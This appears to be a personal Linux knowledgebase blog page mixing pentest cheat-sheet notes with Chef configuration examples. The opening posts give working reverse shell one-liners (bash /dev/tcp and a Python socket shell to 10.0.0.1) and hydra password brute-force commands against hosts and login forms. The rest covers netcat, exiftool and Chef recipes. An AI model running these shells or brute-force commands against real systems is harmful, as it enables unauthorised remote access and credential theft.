Tikejhya: Ashish Nepal

Knowledgebase

Category: Linux (Page 1 of 30)

reverse shell

Your ads will be inserted here by

Easy Plugin for AdSense.

Please go to the plugin admin page to
Paste your ad code OR
Suppress this ad slot.

Bash

Some versions of bash can send you a reverse shell (this was tested on Ubuntu 10.10):

bash -i >& /dev/tcp/10.0.0.1/8080 0>&1

Python

This was tested under Linux / Python 2.7:

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.0.1",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

Ref: http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet
You have already voted.

steganography & exiftool

Your ads will be inserted here by

Easy Plugin for AdSense.

Please go to the plugin admin page to
Paste your ad code OR
Suppress this ad slot.

Using steganography, secret messages can be embedded into images.

using exiftool to discover a base64 encoded message on the image metadata

apt install libimage-exiftool-perl
exiftool /tmp/for-007.jpg

You have already voted.

hydra [by example]

Your ads will be inserted here by

Easy Plugin for AdSense.

Please go to the plugin admin page to
Paste your ad code OR
Suppress this ad slot.

hydra -L Boris -P /usr/share/wordlists/fasttrack.txt -t20 172.28.128.3 -s55007 -I pop3

Hydra is a parallelized login cracker which supports numerous protocols to attack.

 

Examples:
hydra -l user -P passlist.txt ftp://192.168.0.1
hydra -L userlist.txt -p defaultpw imap://192.168.0.1/PLAIN
hydra -C defaults.txt -6 pop3s://[2001:db8::1]:143/TLS:DIGEST-MD5
hydra -l admin -p password ftp://[192.168.0.0/24]/
hydra -L logins.txt -P pws.txt -M targets.txt ssh
hydra 172.28.128.5 http-post-form “/path/index.php:key=^PASS^:invalid key” -l username -P /usr/share/dict/words -t 10 -w 30 -o hydra-http-post-attack.txt

quick tip: you may want to send two keys:; user=^USER^&pass=^PASS^:Bad login”
Host =172.28.128.5
Method = http-form-post
URL =/path/index.php
Form parameters =key=^PASS^
Failure response =invalid key
Users file = users.txt
Password file =/usr/share/dict/words
Threads = -t 10
Wait for timeout = -w 30
Output file = -o hydra-http-post-attack.txt

You have already voted.

Netcat

Netcat test open port

nc -zv 192.168.1.15 22

In the command above, the flag:

  1. -z – sets nc to simply scan for listening daemons, without actually sending any data to them.
  2. -v – enables verbose mode.

Passing -u you can test udp port.

Using Netcat for File Transfers

Receiver

nc -l -p 3334 > file

will begin listening on port 3334.

Sender

nc -w 3 [IP_of_destination] 3334 < file

Compression can be used too

Reciver

nc -l -p 3334 | uncompress -c | tar xvfp -

Sender

tar cfp - /some/dir | compress -c | nc -w 3 [IP_of_destination] 3334
You have already voted.

chef [rendering template]

filebeat:
prospectors:

<% @rolename.each do |role| %>
#Some prospector should be passed in here based on role
<%= render "filebeat-syslog.yaml.erb" -%>

<%= render "filebeat-#{role}.yaml.erb" -%>
<% end %>
registry_file: <%= @path_registry %>

output:

logstash:
hosts: [“<%= node.filebeats.logstashhost %>:<%= node.filebeats.logstashport %>“]
#tls:
#certificate_authorities: [“/etc/pki/tls/certs/beats.crt”]
#insecure: true

shipper:

logging:

files:
rotateeverybytes: 10485760 # = 10MB

#In above rendering, variables comes from recipe which is loaded attributes.

$ cat attributes/default.rb
default[‘filebeat’][‘apache_log_file’] = [‘/var/log/httpd/*error_log’, ‘/var/log/httpd/*access_log’]

$ cat recipes/config.rb
rolename = node.roles

template ‘/etc/filebeat/filebeat.yml’ do
source ‘filebeat-default.yaml.erb’
mode ‘0440’
owner ‘root’
group ‘root’
variables(
path_apache_log_file: node[‘filebeat’][‘apache_log_file’],
input_type: node[‘filebeat’][‘input_type’],
document_type: node[‘filebeat’][‘document_type’],
path_registry: node[‘filebeat’][‘registry’],
:rolename => rolename,

)
end

$ cat templates/default/filebeat-default.yaml.erb
filebeat:
prospectors:

<% @rolename.each do |role| %>
#Some prospector should be passed in here based on role
<%= render "filebeat-syslog.yaml.erb" -%>

<%= render "filebeat-#{role}.yaml.erb" -%>
<% end %>
registry_file: <%= @path_registry %>

output:

logstash:
hosts: [“<%= node.filebeats.logstashhost %>:<%= node.filebeats.logstashport %>“]
#tls:
#certificate_authorities: [“/etc/pki/tls/certs/beats.crt”]
#insecure: true

shipper:

logging:

files:
rotateeverybytes: 10485760 # = 10MB
[ashnep@mgmt1-prod1 filebeats]$ cat templates/default/filebeat-magento.yaml.erb
<% @path_apache_log_file.each do |j| %>

paths:
– <%= j %>
input_type: <%= @input_type %>
<% if j =~ /error_log/ %>
document_type: apache-error-log
<% else %>
document_type: apache-access-log
<% end %>
fields:
service:
zone: <%= @zone %>

<% end %>

chef [templates]

template “/data/project/config.inc” do
source ‘config.inc.erb’
variables(
smtp_host: node[‘smtp’][‘host’],
smtp_port: node[‘smtp’][‘port’],
suffix: suffix,
)
owner ‘apache’
group ‘apache’
mode ‘0744’
end

Chef [Cron]

cron ‘job1’ do
minute ‘*/5’
command “some command here &> /dev/null”
end

Chef Basics [attributes if else, loop ]

#replace
Ohai2u tikejhya@web1-prod1!
chef (12.14.89)> node.name.gsub(/.*-/, ”)
=> “prod1″
chef (12.14.89)> node.name.gsub(/-.*/, ”)
=> “web1”
chef (12.14.89)>

#array of packages to install
default[‘dep’][‘packages’] = %w(mysql php-pdo php-ldap php-gd php-pear httpd php-cli php-mysql php-xml php-mbstring php-pecl-memcache php-devel php-common php php-mcrypt php-pecl-apc php-soap vsftpd)

# marking admin value if condition met
node.run_list?(‘role[admin]’) == true ? default[‘admin’] = TRUE : default[‘admin’] = FALSE

# if else
if node[‘admin’]
default[‘php’][‘max_execution_time’] = 30
else
default[‘php’][‘max_execution_time’] = 180
end

# case statement with loop’s
case node.chef_environment
when ‘prod’
default[‘nfs’][‘nfs_mount_point’] = ‘/data/en-UK/media’
when ‘prod2’
default[‘nfs’][‘nfs_mount_point’] = ‘/data/en-UK/media/files’
when ‘prod3’
%w(en-UK de-DE es-ES).each do |sites|
default[“#{sites}”][‘efs_mount_point’] = “/data/#{sites}/media/efs-files”
default[“#{sites}”][‘nfs_mount_point’] = “/data/#{sites}/media/nfs-files”
default[“#{sites}”][‘app_mount_point’] = “/data/#{sites}/media/files”
end

Chef [data bags]

#Chef using data bags value

#Lets see data bag called staging for webserver
$ knife data bag show staging webserver
mysql:
hostname: db1.tikeweb.com
username: admin

#load data bag into some holder
config = Chef::DataBagItem.load(‘staging’, ‘webserver’)

#load mysql hostname
node.default[‘mysql-hostname’] = config[‘mysql’][hostname]
or
node.default_unless[‘mysql-hostname’] = config[‘mysql’][hostname]

#This can now be used as variable inside recipe which you want to push via template.

Chef Basics [chef-client]

#Chef-client pull recipe from client
chef-client -o ‘recipe[filebeats]’
chef-client -o ‘recipe[filebeats]’ -l debug

Page 1 of 30

Powered by WordPress & Theme by Anders Norén